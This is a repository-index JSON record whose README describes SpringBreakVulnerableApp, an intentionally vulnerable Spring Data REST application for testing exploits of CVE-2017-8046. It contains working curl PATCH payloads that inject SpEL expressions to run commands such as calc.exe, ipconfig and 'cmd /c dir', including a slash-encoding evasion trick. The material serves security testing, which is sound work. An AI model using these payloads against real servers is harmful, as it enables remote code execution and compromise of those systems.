{"id":20012765,"url":"https://github.com/m3ssap0/springbreakvulnerableapp","last_synced_at":"2025-07-17T13:39:47.222Z","repository":{"id":178595595,"uuid":"124410900","full_name":"m3ssap0/SpringBreakVulnerableApp","owner":"m3ssap0","description":"WARNING: This is a vulnerable application to test the exploit for the Spring Break vulnerability (CVE-2017-8046). Run it at your own risk!","archived":false,"fork":false,"pushed_at":"2018-10-08T23:18:25.000Z","size":8,"stargazers_count":13,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-05-04T21:35:38.322Z","etag":null,"topics":["cve-2017-8046","exploit","security","security-tools","spring-break","spring-data-rest","vulnerability","vulnerability-scanners"],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/m3ssap0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-03-08T15:29:44.000Z","updated_at":"2025-04-10T13:30:23.000Z","dependencies_parsed_at":null,"dependency_job_id":"86437eff-c76b-4bc9-8429-891bd5ebcb49","html_url":"https://github.com/m3ssap0/SpringBreakVulnerableApp","commit_stats":null,"previous_names":["m3ssap0/springbreakvulnerableapp"],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/m3ssap0/SpringBreakVulnerableApp","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m3ssap0%2FSpringBreakVulnerableApp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m3ssap0%2FSpringBreakVulnerableApp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m3ssap0%2FSpringBreakVulnerableApp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m3ssap0%2FSpringBreakVulnerableApp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/m3ssap0","download_url":"https://codeload.github.com/m3ssap0/SpringBreakVulnerableApp/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m3ssap0%2FSpringBreakVulnerableApp/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":265611774,"owners_count":23797957,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2017-8046","exploit","security","security-tools","spring-break","spring-data-rest","vulnerability","vulnerability-scanners"],"created_at":"2024-11-13T07:33:09.533Z","updated_at":"2025-07-17T13:39:47.204Z","avatar_url":"https://github.com/m3ssap0.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Spring Break Vulnerable Application\n\nThis is a vulnerable application to test the exploit for the **Spring Break** vulnerability (**CVE-2017-8046**).\n\n## WARNING!\n\n**This application contains serious security vulnerabilities. Run it at your own risk! It is recommended using a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet facing servers, as they will be compromised.**\n\n***DISCLAIMER*: I do not take responsibility for the way in which any one uses this application (SpringBreakVulnerableApp). The only purpose of this application is to be a test scenario for the Spring Break exploit and it should not be used maliciously. If your server is compromised via an installation of SpringBreakVulnerableApp it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.**\n\n## Vulnerability info\n\n* **CVE-ID**: CVE-2017-8046\n* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046)\n* **Description**: Malicious *PATCH* requests submitted to *spring-data-rest* servers in **Pivotal Spring Data REST** versions prior to **2.5.12**, **2.6.7**, **3.0 RC3**, **Spring Boot** versions prior to **2.0.0M4**, and **Spring Data** release trains prior to **Kay-RC3** can use specially crafted JSON data to run arbitrary Java code.\n\n## Usage\n\nThe application can be launched with the following Maven command.\n\n```\nmvn spring-boot:run\n```\nA fat jar can be generated with the following Maven command.\n\n```\nmvn clean install spring-boot:repackage\n```\n\nTo insert data you can use the following curl command.\n\n```\ncurl -i -X POST -H \"Content-Type: application/json\" -d '{ \"name\" : \"Test\", \"attribute\" : \"foo\"}' http://hostname:port/entity\n```\n\n## Exploit\n\nProbably the simplest exploit is the following request.\n\n```\ncurl --request PATCH -H \"Content-Type: application/json-patch+json\" -d '[{ \"op\" : \"replace\", \"path\" : \"T(java.lang.Thread).sleep(10000).x\", \"value\" : \"pwned\" }]' \"http://hostname:port/entity/1\"\n```\n\nOn Windows, the `calc.exe` process can be launched with the following request. Similar requests can be used to launch arbitrary commands.\n\n```\ncurl --request PATCH -H \"Content-Type: application/json-patch+json\" -d '[{ \"op\" : \"replace\", \"path\" : \"T(java.lang.Runtime).getRuntime().exec(\\\"calc.exe\\\").x\", \"value\" : \"pwned\" }]' \"http://hostname:port/entity/1/\"\n```\n\nTo obtain the output of launched commands, some \"gadgets\" offered by Spring Framework code can be used. Luckily, no external dependencies are required. For example, the result of `ipconfig` command can be retrieved with the following request.\n\n```\ncurl --request PATCH -H \"Content-Type: application/json-patch+json\" -d '[{ \"op\" : \"replace\", \"path\" : \"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\\\"ipconfig\\\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x\", \"value\" : \"pwned\" }]' \"http://hostname:port/entity/1/\"\n```\n\nOn Windows, a `cmd /c dir` command, and other similar commands, can be launched with the following request. Please note the trick used to insert the slash char avoiding the explicit value (i.e. explicit slashes are replaced with dots befor the real parsing).\n\n```\ncurl --request PATCH -H \"Content-Type: application/json-patch+json\" -d '[{ \"op\" : \"replace\", \"path\" : \"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\\\"cmd \\\" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \\\"c dir\\\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x\", \"value\" : \"pwned\" }]' \"http://hostname:port/entity/1/\"\n```\n\nA Java program to exploit this vulnerability can be found [here](https://github.com/m3ssap0/spring-break_cve-2017-8046).\n\n## Authors\n\n* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)\n\n## License\n\nThis project is licensed under the MIT License - see the **LICENSE.txt** file for details.\n\n## Acknowledgments\n\n* [Man Yue Mo](https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql) the security researcher who discovered the vulnerability","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fm3ssap0%2Fspringbreakvulnerableapp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fm3ssap0%2Fspringbreakvulnerableapp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fm3ssap0%2Fspringbreakvulnerableapp/lists"}